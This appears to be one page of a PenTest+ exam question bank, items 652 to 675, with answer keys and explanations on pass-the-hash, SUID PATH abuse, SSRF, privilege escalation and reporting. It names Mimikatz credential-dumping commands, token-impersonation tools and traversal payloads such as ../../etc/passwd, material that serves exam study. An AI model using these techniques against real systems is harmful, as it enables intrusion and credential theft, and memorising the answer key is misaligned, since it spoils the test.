Reflected XSS occurs when the injected script is reflected off the web server immediately.

652
Multi-Selectmedium

Which TWO of the following are common techniques used during a pass-the-hash attack? (Select TWO.)

Select 2 answers
A.Extracting NTLM hashes from LSASS
B.Performing a brute-force attack on the hash
C.Using a password spray attack
D.Injecting hashes into a process to authenticate
E.Requesting Kerberos TGS tickets
AnswersA, D

LSASS (Local Security Authority Subsystem Service) caches NTLM hashes for interactive and network logons so users don't re-authenticate constantly. An attacker with admin rights can use Mimikatz's sekurlsa::logonpasswords or dump memory with ProcDump to extract these hashes, which are then directly usable for pass-the-hash. This step is essential because PtH relies on having a valid hash rather than the plaintext password.

Why this answer

Option A is correct because pass-the-hash attacks commonly begin by dumping NTLM password hashes from the LSASS process memory (e.g., with Mimikatz's sekurlsa::logonpasswords or ProcDump), since LSASS caches credential material of logged-on users. Option D is correct because the core of pass-the-hash is reusing a captured NTLM hash without cracking it, typically by injecting it into a process or authentication context (e.g., Mimikatz sekurlsa::pth or Impacket's psexec with -hashes) so the attacker authenticates as the victim over NTLM. Option B is not a pass-the-hash technique because brute-forcing a hash is a cracking attempt to recover the plaintext, which pass-the-hash deliberately avoids.

Option C is unrelated, as password spraying tries a few common passwords across many accounts and does not use captured hashes. Option E describes Kerberos ticket abuse (e.g., overpass-the-hash or golden ticket), not the NTLM hash reuse that defines pass-the-hash.

Exam trap

CompTIA often tests the distinction between pass-the-hash and hash cracking: candidates mistakenly think brute-forcing the hash (Option B) is part of the attack, but pass-the-hash reuses the hash as-is, never attempting to reverse it.

653
MCQeasy

A penetration tester needs to gather information about a target organization's employees and email addresses from public sources. Which passive reconnaissance tool is BEST suited for this task?

A.Nikto
B.Nmap
C.Wireshark
D.Maltego
AnswerD

Maltego is an OSINT and data-mining platform that uses transforms to query public data sources—DNS records, document metadata, social media, search engines, and breach databases—then visually links entities to reveal relationships. It is designed for passive reconnaissance and relationship mapping, making it the right choice for gathering email addresses and employee information about a target without interacting with the target's own infrastructure. The tool's graph-based analysis lets a tester pivot from an organization name to individuals, roles, and associated domains, which is exactly the stated task.

Why this answer

Maltego is a passive reconnaissance tool that excels at gathering information from public sources, including employee names, email addresses, and organizational relationships, by querying open-source intelligence (OSINT) data such as social media, search engines, and DNS records. It uses transforms to automate data collection and link analysis, making it ideal for this task without directly interacting with the target's systems.

Exam trap

The trap here is that candidates often confuse active scanning tools (like Nikto or Nmap) with passive reconnaissance, failing to recognize that Maltego is specifically designed for OSINT gathering from public sources without sending probes to the target.

How to eliminate wrong answers

Option A is wrong because Nikto is an active web server scanner that sends HTTP requests to identify vulnerabilities, not a passive tool for gathering employee or email data from public sources. Option B is wrong because Nmap is an active network scanning tool that sends packets to discover hosts and services, which is not passive and does not collect employee or email information. Option C is wrong because Wireshark is a network protocol analyzer that captures and inspects live traffic, requiring active packet capture and not suitable for passive OSINT gathering from public sources.

654
MCQmedium

During a web application test, a penetration tester discovers that the server returns verbose error messages containing full file paths. Which type of attack is directly facilitated by this information disclosure?

A.Path traversal
B.SQL injection
C.CSRF
D.Cross-site scripting
AnswerA

Disclosed internal file paths (e.g., from error messages, debug endpoints, or poorly commented source) give an attacker a map of the server's directory structure. Armed with this knowledge, they can craft traversal payloads such as ../../etc/passwd or use URL-encoded variants like %2e%2e%2f to bypass naive filters and read arbitrary files outside the web root. This is the core of a path traversal (directory traversal) vulnerability, where unchecked file path parameters directly expose host filesystem contents.

Why this answer

Verbose error messages revealing file paths can enable path traversal attacks, as the attacker learns the directory structure. SQL injection may be facilitated by database error messages, but file paths are specific to path traversal.

655
MCQhard

A tester is exploiting a Linux system and finds a binary with the SUID bit set owned by root. The binary executes other commands. Which technique would allow privilege escalation to root?

A.DLL hijacking
B.Kernel exploit
C.Token impersonation
D.PATH manipulation
AnswerD

When a SUID binary executes an external command using a relative path, such as calling system('ls') or execvp('ls', ...), it relies on the PATH environment variable set by the invoking user. An attacker can prepend a custom directory to PATH containing a malicious executable with the name of the expected command; since the SUID binary runs with root privileges, the malicious executable executes with root privileges, granting privilege escalation. The exploit succeeds only if the binary does not sanitize the environment (e.g., via secure_getenv) and uses a relative path instead of an absolute path. This is precisely the described scenario, making PATH manipulation the correct answer.

Why this answer

If a SUID binary executes commands (e.g., via system() or exec()), it may be exploited to run arbitrary commands as root, especially if the path is not absolute.

656
MCQhard

During a Windows privilege escalation attempt, a tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool can be used to exploit this privilege to gain SYSTEM access?

A.PrintSpoofer
B.PowerUp
C.CrackMapExec
D.Mimikatz
AnswerA

PrintSpoofer exploits SeImpersonatePrivilege by coercing a privileged process to connect to a named pipe it controls, then impersonating the resulting token to gain SYSTEM. It satisfies the stem's Windows local escalation constraint directly, unlike token-stealing tools that require existing high-integrity tokens or kernel exploits.

Why this answer

PrintSpoofer exploits the SeImpersonatePrivilege by abusing the Windows Print Spooler service's named pipe (\\.\pipe\spoolss) to coerce a SYSTEM-level token and impersonate it, yielding NT AUTHORITY\SYSTEM. It is specifically designed for the SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege abuse class (alongside JuicyPotato, RoguePotato, and GodPotato). Because the question explicitly names SeImpersonatePrivilege, PrintSpoofer is the direct match.

Exam trap

PT0-003 often tests the mapping between a specific Windows privilege (SeImpersonatePrivilege, SeBackupPrivilege, SeDebugPrivilege) and the exact tool that abuses it — candidates confuse general-purpose tools like Mimikatz or PowerUp with the token-impersonation exploiters (PrintSpoofer, JuicyPotato, RoguePotato).

How to eliminate wrong answers

Option B is wrong because PowerUp is a PowerShell privilege-escalation enumeration and misconfiguration-abuse script (unquoted service paths, weak service permissions, AlwaysInstallElevated) — it does not weaponize SeImpersonatePrivilege. Option C is wrong because CrackMapExec is a post-exploitation lateral-movement and SMB/WinRM spraying framework, not a local token-impersonation exploit. Option D is wrong because Mimikatz is a credential-extraction and Kerberos-abuse tool (sekurlsa, DCSync, golden tickets); while it can perform token manipulation, it is not the tool used to exploit SeImpersonatePrivilege for SYSTEM escalation.

657
MCQmedium

During a penetration test, the tester discovers that a third-party vendor has remote access to the client's network. The vendor was not mentioned in the scope of work. How should the tester communicate this finding in the report?

A.Ignore it entirely because it is outside the testing agreement.
B.Document it in the 'Observations' or 'Out-of-Scope Findings' section.
C.Include it as a critical vulnerability in the main findings.
D.Remove the finding because it is out of scope.
AnswerB

The vendor's remote access sits outside the agreed scope, so it must not be presented as an in-scope vulnerability. Recording it under Observations or Out-of-Scope Findings preserves the evidence for the client while keeping the formal findings aligned to the authorised scope of work.

Why this answer

The correct option is B: Document it in the 'Observations' or 'Out-of-Scope Findings' section. Even though the third-party vendor's remote access was not in the scope of work, it is a relevant security-relevant discovery that the client should know about, and standard penetration testing reporting practices (e.g., PTES, OWASP Testing Guide) provide an out-of-scope or observations section for exactly such items. This preserves the integrity of the agreed scope while still delivering value to the client.

Option A is wrong because ignoring a discovered risk is unprofessional and could harm the client. Option C is wrong because it was not tested or validated as a vulnerability, so labeling it critical in the main findings would misrepresent the engagement. Option D is wrong because removing the finding entirely withholds potentially important information from the client.

658
Multi-Selectmedium

During a Windows privilege escalation attempt, the tester finds that the current user has SeImpersonatePrivilege enabled. Which THREE tools or techniques can be used to exploit this privilege?

Select 3 answers
A.JuicyPotato
B.Mimikatz
C.RoguePotato
D.PrintSpoofer
E.PowerUp
AnswersA, C, D

JuicyPotato is a refined implementation of the Rotten Potato attack that abuses SeImpersonatePrivilege by leveraging COM object activation. It uses a DCOM server to trigger an NTLM authentication using the machine account, then duplicates the resulting token to execute arbitrary commands with SYSTEM integrity. This tool made the attack practical on Windows Server 2016 and later, although some methods were patched in current builds.

Why this answer

PrintSpoofer, RoguePotato, and JuicyPotato exploit SeImpersonatePrivilege to gain SYSTEM. Mimikatz is for credential dumping, and PowerUp is a PowerShell script for privilege escalation but not specific to this privilege.

659
MCQmedium

A penetration tester has completed an engagement and needs to present findings to a mixed audience of technical engineers and business executives. Which section of the penetration test report is BEST suited for communicating high-level risk ratings and potential business impact to the non-technical stakeholders?

A.Executive Summary
B.Technical Findings and Vulnerability Details
C.Remediation Steps
D.Appendix
AnswerA

The Executive Summary is explicitly designed for non-technical leadership, distilling the engagement's key findings into business-oriented language. It presents overall risk severity, quantifies potential business impact (e.g., financial loss, regulatory fines), and prioritizes issues by strategic importance. This high-level view allows executives to make informed risk acceptance decisions without needing to interpret exploit mechanics or raw scan data.

Why this answer

The Executive Summary is the correct section because it is specifically designed to communicate high-level risk ratings, business impact, and strategic recommendations to non-technical stakeholders such as executives. It avoids technical jargon and focuses on the business context, aligning with the PT0-002 objective of tailoring reports to the audience.

Exam trap

CompTIA often tests the candidate's ability to distinguish between audience-appropriate report sections, and the trap here is assuming that 'Technical Findings' is the most important section for all stakeholders, when in fact the Executive Summary is the primary communication tool for non-technical decision-makers.

How to eliminate wrong answers

Option B is wrong because Technical Findings and Vulnerability Details contains in-depth technical descriptions, CVSS scores, proof-of-concept code, and exploit paths that are intended for engineers, not for executives who need a high-level overview. Option C is wrong because Remediation Steps provides specific technical fixes (e.g., patch versions, configuration changes) that require technical understanding to implement, and it does not prioritize business impact or risk ratings for non-technical readers.

660
MCQeasy

A penetration tester wants to discover subdomains of a target domain without sending any packets directly to the target's network. Which resource is most effective for this purpose?

A.DNS brute force with a wordlist
B.Certificate Transparency logs
C.WHOIS lookup
D.Traceroute
AnswerB

Certificate Transparency logs are public, auditable records of every SSL/TLS certificate issued by participating certificate authorities. By querying these logs for the target domain (e.g., via crt.sh or the official CT API), a tester can retrieve a comprehensive list of subdomains that have had certificates issued, including historical ones. This is passive reconnaissance because it uses third-party data without sending any packets to the target, making it stealthy and highly effective.

Why this answer

Certificate Transparency (CT) logs are publicly accessible, append-only ledgers that record every SSL/TLS certificate issued by a Certificate Authority (CA). Since certificates often include Subject Alternative Names (SANs) listing subdomains, querying CT logs (e.g., via crt.sh or tools like `certigo`) reveals subdomains without any direct network probes. This makes CT logs the most effective passive reconnaissance resource, as no packets are sent to the target's infrastructure.

Exam trap

CompTIA often tests the distinction between active and passive reconnaissance; the trap here is assuming DNS brute force is passive because it uses a wordlist, but it actively queries DNS servers, whereas CT logs are truly passive as they rely on publicly archived certificate data.

How to eliminate wrong answers

Option A is wrong because DNS brute force with a wordlist requires sending DNS queries to the target's authoritative name servers, which generates network traffic and directly interacts with the target's infrastructure, violating the 'no packets sent' constraint. Option C is wrong because WHOIS lookup provides registration details (e.g., registrar, admin contacts) for the domain itself, not subdomains; it relies on WHOIS servers and does not enumerate subdomains from certificate data.

661
MCQmedium

During a penetration test, a tester needs to perform a man-in-the-middle (MITM) attack on a local network to capture credentials. Which tool should the tester use to ARP spoof and intercept traffic?

A.Wireshark
B.Nmap
C.TCPDump
D.Ettercap
AnswerD

Ettercap is a dedicated MITM attack toolkit that supports active ARP poisoning, allowing the attacker to impersonate the default gateway and intercept traffic. It sends forged ARP replies to associate the target's IP with the attacker's MAC address, then forwards packets to the legitimate destination. Ettercap also includes filters, SSL stripping, and password sniffing, making it purpose-built for this task.

Why this answer

Ettercap is a comprehensive MITM tool that supports ARP spoofing, sniffing, and injection. Wireshark is for packet analysis, not active spoofing. TCPDump is for packet capture only.

Nmap can be used for discovery but not MITM.

662
MCQeasy

Which of the following is a common community string used in SNMP enumeration?

A.root
B.snmp
C.public
D.admin
AnswerC

The default read-only community string in virtually all SNMPv1/v2c implementations is 'public.' It is a well-known, publicly documented string that attackers test first when discovering an SNMP service. Many devices ship with 'public' enabled, and leaving it unchanged is a critical misconfiguration. This ubiquity is why 'public' is the correct answer to the question.

Why this answer

The default community strings for SNMP are often 'public' for read-only and 'private' for read-write access.

663
MCQmedium

During a web application test, you discover an endpoint that accepts a URL parameter and fetches the content. You try `http://169.254.169.254/latest/meta-data/` and receive a response. Which vulnerability is this?

A.Cross-Site Request Forgery (CSRF)
B.Local File Inclusion (LFI)
C.Server-Side Request Forgery (SSRF)
D.XML External Entity (XXE)
AnswerC

Server-Side Request Forgery (SSRF) occurs when a web application fetches a user-supplied URL server-side without adequate validation, allowing the attacker to target internal hosts or cloud metadata services. In this scenario, the discovered endpoint likely accepts a URL and makes an HTTP request on behalf of the server, enabling the attacker to query 169.254.169.254/latest/meta-data/ and exfiltrate instance credentials. This matches the described behavior exactly: the server, not the user's browser, performs the request and returns the response to the attacker.

Why this answer

The IP 169.254.169.254 is the cloud metadata endpoint; accessing it indicates SSRF.

664
MCQmedium

A penetration tester is reviewing a Python script that uses the 'mitmproxy' library. The script sets up a proxy and captures HTTP traffic, then modifies certain requests in real time. Which of the following is the most likely purpose of this script?

A.To perform passive network mapping and port scanning
B.To intercept and manipulate API requests for security testing
C.To capture raw network packets for offline analysis
D.To automatically detect SQL injection vulnerabilities
AnswerB

Mitmproxy is purpose-built to intercept HTTP/HTTPS traffic, decrypt it, and present it for inspection and live modification. For API security testing, this lets testers alter JSON bodies, headers, query strings, and authentication tokens mid-session to test input validation, authorization bypasses, business logic flaws, and replay attacks. Its Python scripting API enables automated, conditional tampering that directly supports API fuzzing and negative test scenarios, making it a standard tool for dynamic API assessment.

Why this answer

The mitmproxy library is specifically designed for man-in-the-middle interception and modification of HTTP/HTTPS traffic. By setting up a proxy and modifying requests in real time, the script's most likely purpose is to intercept and manipulate API requests for security testing, such as fuzzing parameters, injecting payloads, or bypassing client-side controls.

Exam trap

The trap here is that candidates often confuse mitmproxy with passive sniffing tools like Wireshark, failing to recognize that mitmproxy's core feature is active interception and modification of application-layer traffic, not just passive observation or raw packet capture.

How to eliminate wrong answers

Option A is wrong because passive network mapping and port scanning rely on tools like Nmap or Wireshark to observe traffic without modification, whereas mitmproxy actively intercepts and alters traffic, which is not passive. Option C is wrong because capturing raw network packets for offline analysis is the function of packet sniffers like tcpdump or Wireshark, which operate at the network layer (Layer 3) and do not modify requests; mitmproxy works at the application layer (Layer 7) and is designed for real-time manipulation, not offline capture.

665
MCQhard

During a code review of a PHP web application, you encounter the following code: $result = mysql_query("SELECT * FROM users WHERE username='" . $_GET['user'] . "'");. Which vulnerability does this represent?

A.Cross-site scripting (XSS)
B.Path traversal
C.Command injection
D.SQL injection
AnswerD

SQL injection is confirmed when user input is embedded directly into an SQL query without sanitization or parameterization, allowing the attacker to modify the query's logic. For example, input like ' OR '1'='1 can bypass authentication, and UNION SELECT statements can extract data from other tables. This occurs because the database engine interprets the attacker's input as part of the SQL syntax, not just as data. Proper defense involves prepared statements with bound parameters or stored procedures, which separate data from SQL code.

Why this answer

Direct concatenation of user input into SQL query without sanitization or parameterization is classic SQL injection.

666
MCQhard

A penetration tester is scoping a test for a client that uses a SaaS application for customer relationship management. The client wants the tester to assess the application's security. What is the most important consideration regarding this SaaS application?

A.The application is hosted on the cloud, so it is automatically in scope
B.The tester should obtain explicit permission from the SaaS provider before testing
C.The tester should only test the client's configuration of the SaaS application
D.The tester can test the application as long as the client provides administrative credentials
AnswerB

When a client uses a third-party SaaS application, the client is only a subscriber and does not own the application's infrastructure or code. The provider retains control over the platform, so any active security testing that targets the application must be explicitly authorized by the provider. This authorization typically takes the form of a written agreement, a penetration-testing rider in the service contract, or a documented engagement with the provider. Without the provider's explicit permission, the tester would be performing unauthorized access against a system they do not own, which could be illegal and could impact other tenants.

Why this answer

The tester must ensure that the SaaS provider's terms of service allow security testing and that permission is obtained.

667
MCQmedium

A penetration tester is writing a Bash script to automate enumeration of a Linux system after gaining a shell. The script needs to extract user information from the /etc/passwd file. Which command would be most efficient for listing only the usernames?

A.cat /etc/passwd | cut -d: -f1
B.cat /etc/passwd | awk '{print $1}'
C.cat /etc/passwd | head
D.grep 'user' /etc/passwd
AnswerA

Piping /etc/passwd into cut with the colon delimiter and field 1 extracts only the username column, the first field of each record. This avoids parsing overhead and returns a clean list, directly satisfying the requirement to enumerate usernames efficiently.

Why this answer

The `cut` command with `-d: -f1` splits each line of /etc/passwd on the colon delimiter and extracts the first field, which is the username. This is the most efficient and purpose-built approach for parsing colon-delimited files in Linux, avoiding unnecessary overhead from other tools.

Exam trap

The trap here is that candidates often assume `awk` with default field splitting works for colon-delimited files, but they forget to specify the `-F:` flag, leading to incorrect output that includes the entire line or unexpected fields.

How to eliminate wrong answers

Option B is wrong because `awk '{print $1}'` defaults to whitespace field splitting, but /etc/passwd uses colons as delimiters, so it would print the entire line (since the line has no spaces before the first colon) rather than just the username. Option C is wrong because `head` outputs the first 10 lines of the file by default, not just usernames, and does not parse or extract specific fields at all.

668
MCQeasy

A penetration tester is performing passive reconnaissance and wants to identify subdomains associated with a target domain without directly querying the target's DNS servers. Which tool is specifically designed for this purpose?

A.WPScan
B.Nmap
C.theHarvester
D.Gobuster
AnswerC

theHarvester aggregates subdomains from public sources such as search engines, certificate transparency logs and OSINT datasets, so no packets reach the target's authoritative DNS servers. That satisfies the passive-reconnaissance constraint in the stem, unlike active brute-forcing or zone-transfer tools that query the domain directly.

Why this answer

TheHarvester is specifically designed for passive reconnaissance, gathering subdomains from public sources like search engines (Google, Bing), PGP key servers, and the Shodan database without querying the target's DNS servers directly. This aligns with the requirement to avoid direct interaction with the target's infrastructure, making it the correct choice for passive subdomain enumeration.

Exam trap

The trap is that candidates often confuse passive reconnaissance with tools that perform subdomain enumeration via active queries (e.g., Gobuster or Nmap's dns-brute script), causing them to overlook theHarvester's passive data collection from public sources.

How to eliminate wrong answers

Option A is wrong because WPScan is a WordPress vulnerability scanner that actively probes the target web server, not a passive reconnaissance tool for subdomain discovery. Option B is wrong because Nmap is an active network scanner that sends packets to target hosts, directly querying DNS servers if used with scripts like dns-brute, which violates the passive requirement. Option D is wrong because Gobuster performs active brute-force enumeration of subdomains by sending DNS queries to the target's DNS servers, making it an active technique, not passive.

669
MCQhard

A penetration tester is analyzing a Python script that performs a buffer overflow attack. The script imports the struct module and the socket module. It constructs a payload by packing a pattern of characters, then overwriting a return address with a specific offset. Which of the following is the most critical piece of information the tester must determine before running this script against the target?

A.The IP address and port of the target service
B.The exact location of a JMP ESP instruction in memory
C.The version of the operating system running on the target
D.The username and password for the target service
AnswerB

For a buffer overflow where the shellcode is placed in the stack, overwriting the return address with the address of a JMP ESP instruction (which must be at a fixed, predictable address) will redirect execution to the shellcode. Determining this address is crucial for a reliable exploit.

Why this answer

The script performs a buffer overflow attack by overwriting a return address. To redirect execution to attacker-controlled shellcode, the tester must overwrite the return address with the address of a JMP ESP instruction (or equivalent) that is reliably located in memory. Without this address, the overwritten return pointer will cause a crash or unpredictable behavior, making exploitation impossible.

Exam trap

The trap here is that candidates often focus on network connectivity (IP/port) or OS version, overlooking that the core technical challenge in a buffer overflow exploit is controlling execution flow via a reliable return address like JMP ESP.

How to eliminate wrong answers

Option A is wrong because while the IP address and port are necessary to connect to the target service, they are not the most critical piece of information for the exploitation phase; the script already imports socket and presumably has connection details. Option C is wrong because the OS version can help in selecting appropriate offsets or shellcode, but the immediate critical requirement is the address of a JMP ESP instruction, which depends on the specific executable or loaded DLL, not just the OS version.

670
MCQeasy

A client is planning a penetration test of their AWS cloud environment. They will provide the tester with an IAM user account with limited permissions. Which of the following scoping restrictions is most important to include in the rules of engagement to avoid unexpected costs?

A.The tester must not create any new AWS resources that incur costs.
B.The tester must use only premium AWS services for testing.
C.The tester must request permission from AWS Support before each test.
D.The tester must avoid testing in the us-east-1 region due to higher costs.
AnswerA

The restriction that the tester must not create any new AWS resources that incur costs is a core cost-control measure in cloud penetration testing. Launching EC2 instances, RDS databases, or even ephemeral resources for vulnerability scanning can rack up charges rapidly, especially if left running. This constraint forces the tester to work within the client's existing environment, using serverless functions or pre-provisioned test instances, and to rely on AWS budget alerts and billing monitoring to avoid financial surprise.

Why this answer

Creating new AWS resources (e.g., EC2 instances, RDS databases, Lambda functions) can incur direct costs under the tester's IAM user account, even with limited permissions. The rules of engagement must explicitly prohibit resource creation to prevent unexpected billing, as AWS charges for resources provisioned regardless of the test's purpose. This scoping restriction aligns with the principle of cost containment in penetration testing engagements.

Exam trap

The trap here is that candidates may focus on technical restrictions like service tiers or support permissions, overlooking the direct financial risk of resource creation, which is the most critical scoping concern in cloud penetration testing.

How to eliminate wrong answers

Option B is wrong because requiring the use of only premium AWS services would increase costs unnecessarily and contradicts the goal of avoiding unexpected expenses; premium services are more expensive and not required for effective testing. Option C is wrong because requesting permission from AWS Support before each test is impractical and not a standard scoping restriction; AWS Support does not authorize individual penetration tests, and the tester should rely on the client's authorization and the AWS Acceptable Use Policy.

671
MCQhard

A penetration tester is conducting a red team engagement for a financial institution. The client has requested that the tester simulate a ransomware attack to test the incident response process. During the test, the tester encrypts a file share containing simulated customer data. The client's security team detects the encryption and initiates their incident response plan. Which of the following should the tester do FIRST to ensure the engagement remains within scope and does not cause operational disruption?

A.Document the encryption activity and wait for the client's incident response team to contact the tester
B.Attempt to exfiltrate the simulated customer data to test data loss prevention controls
C.Immediately stop all testing activities and notify the primary point of contact
D.Continue encrypting additional file shares to fully simulate the ransomware attack
AnswerC

The tester should immediately stop testing and notify the primary point of contact. This action ensures that the client's incident response team is aware that the encryption is part of the authorized test, preventing unnecessary escalation or operational disruption. It also allows the client to verify that the test is within scope and that no real data is at risk. Continuing without notification could lead to confusion and potential legal issues.

Why this answer

In a red team engagement, when the client's incident response team detects simulated malicious activity, the tester should immediately stop testing and notify the primary point of contact. This prevents unnecessary escalation and operational disruption, and confirms that the activity is authorized. Continuing the attack or exfiltrating data could exceed the scope and cause unintended consequences.

Proactive communication is key to maintaining trust and safety.

Exam trap

The trap here is thinking that continuing the attack is necessary to fully test the incident response, but it risks operational disruption and going out of scope.

672
Multi-Selecthard

A penetration tester is performing a vulnerability assessment of a web application. The tester wants to identify input validation vulnerabilities that could lead to injection attacks. Which two techniques are most effective for discovering injection flaws such as SQL injection and command injection? (Choose two.)

Select 2 answers
A.Fuzzing input fields with a variety of special characters and payloads
B.Using a web proxy to intercept and manipulate requests with injection payloads
C.Performing a dictionary attack against authentication mechanisms
D.Reviewing the application's source code for improper input sanitization
E.Running a port scan to identify open ports and services
AnswersA, B

Fuzzing involves sending unexpected or malformed data to input fields to observe how the application handles it. For injection flaws, sending characters like single quotes, double quotes, semicolons, and command separators can trigger errors or unexpected behavior. This technique is effective for discovering SQL injection, command injection, and other injection vulnerabilities because it tests the application's input sanitization. It is a core method in dynamic application security testing.

Why this answer

Fuzzing input fields and using a web proxy to manipulate requests are both active testing techniques that directly probe the application's input handling. They allow the tester to send malicious payloads and observe if the application improperly processes them, leading to injection. These methods are effective in black-box testing scenarios where source code is not available.

They are standard practices in web application penetration testing for uncovering injection vulnerabilities.

Exam trap

The trap here is selecting source code review, which is effective but not always available in a penetration test, or selecting unrelated techniques like port scanning or password attacks.

673
MCQmedium

During a web application penetration test, the tester wants to identify the technologies used by the target website. Which of the following tools is best suited for technology fingerprinting?

A.Nikto
B.Nmap
C.Gobuster
D.WhatWeb
AnswerD

WhatWeb is a dedicated website fingerprinting tool that uses a vast repository of plugins and signatures to identify the technologies powering a web application. It analyzes a wide range of signals, including HTTP headers, HTML source code, meta tags, cookies, script URLs, and inline JavaScript variables, to detect CMS platforms, web frameworks, JavaScript libraries, analytics tools, and even specific version numbers. WhatWeb assigns confidence ratings to each detection, allowing a penetration tester to accurately map the technology stack before selecting targeted attack techniques. This purpose-built nature and comprehensive signature coverage make WhatWeb the correct choice for website technology fingerprinting.

Why this answer

WhatWeb (option D) is the correct choice because it is a dedicated web technology fingerprinting tool that identifies CMS platforms, JavaScript libraries, web servers, and frameworks by analyzing HTTP responses, headers, meta tags, and file signatures. In a web application penetration test, this directly addresses the goal of enumerating the technologies behind the target site. Nikto (A) is a web server vulnerability scanner, not a technology fingerprinter, though it may incidentally reveal some server details.

Nmap (B) is a network/host discovery and port scanning tool with limited HTTP fingerprinting via NSE scripts, and Gobuster (C) is a directory and DNS brute-forcing tool, neither of which is purpose-built for identifying web technologies.

674
Multi-Selectmedium

After completing a penetration test, the tester must handle test artifacts appropriately. Which TWO of the following are best practices for data handling and destruction?

Select 2 answers
A.Securely delete all test data after the engagement is complete
B.Return any client data to the client before destruction
C.Keep all test data indefinitely for future reference
D.Store test data in an unencrypted archive on the tester's laptop
E.Share test data with other clients for benchmarking
AnswersA, B

Securely deleting all test data post-engagement is correct because penetration testing engagements typically operate under a data-handling agreement that mandates the tester to either return or destroy all client data upon conclusion. Secure deletion goes beyond normal file removal—it requires cryptographic erase, overwriting with validated patterns (e.g., NIST SP 800-88 Purge), or physical destruction to ensure data is irrecoverable. This mitigates the risk of inadvertent disclosure, maintains client confidentiality, and aligns with the principle of data minimization.

Why this answer

Best practices include securely erasing test data and returning any client data to the client.

675
MCQeasy

A penetration tester is preparing the final report. The client's CEO needs to understand the overall risk level and the business impact of the findings. Which of the following should be included in the executive summary?

A.A detailed list of all vulnerabilities with CVSS scores
B.The exact commands and payloads used during exploitation
C.A quantitative risk analysis including annualized loss expectancy
D.A high-level summary of the test's scope, overall risk rating, and business impact
AnswerD

The executive summary is precisely designed for a high-level overview of the test's scope, overall risk rating, and business impact, enabling non-technical leaders to grasp the risk posture without drowning in technical jargon. This approach helps management prioritize remediation investments and understand potential consequences, such as regulatory fines or reputational damage. By omitting CVSS scores, raw commands, and financial calculations, the summary stays concise, actionable, and aligned with the decision-making needs of executives.

Why this answer

The executive summary is designed for senior management, such as the CEO, who needs a concise overview of the penetration test's scope, overall risk rating, and business impact to make informed decisions. Detailed technical data, such as CVSS scores or exploitation commands, is inappropriate for this audience and belongs in the technical report. Option D directly addresses the requirement for a high-level, business-focused summary.

Exam trap

The trap here is that candidates often confuse the executive summary with the technical report, mistakenly thinking that including detailed CVSS scores or exploitation commands demonstrates thoroughness, when in fact the exam expects a clear separation of audience-specific content.

How to eliminate wrong answers

Option A is wrong because a detailed list of all vulnerabilities with CVSS scores is too granular for an executive summary; CVSS scores are technical metrics that require context and are better placed in the technical findings section. Option B is wrong because exact commands and payloads used during exploitation are operational details intended for the technical team, not for a CEO who needs business impact analysis. Option C is wrong because while quantitative risk analysis (e.g., ALE) can be useful, it is not always feasible or required in a penetration test report; the executive summary should focus on qualitative risk ratings and business impact, not specific financial calculations that may rely on assumptions not validated by the test.

Page 8

Page 9 of 11

Page 10

All pages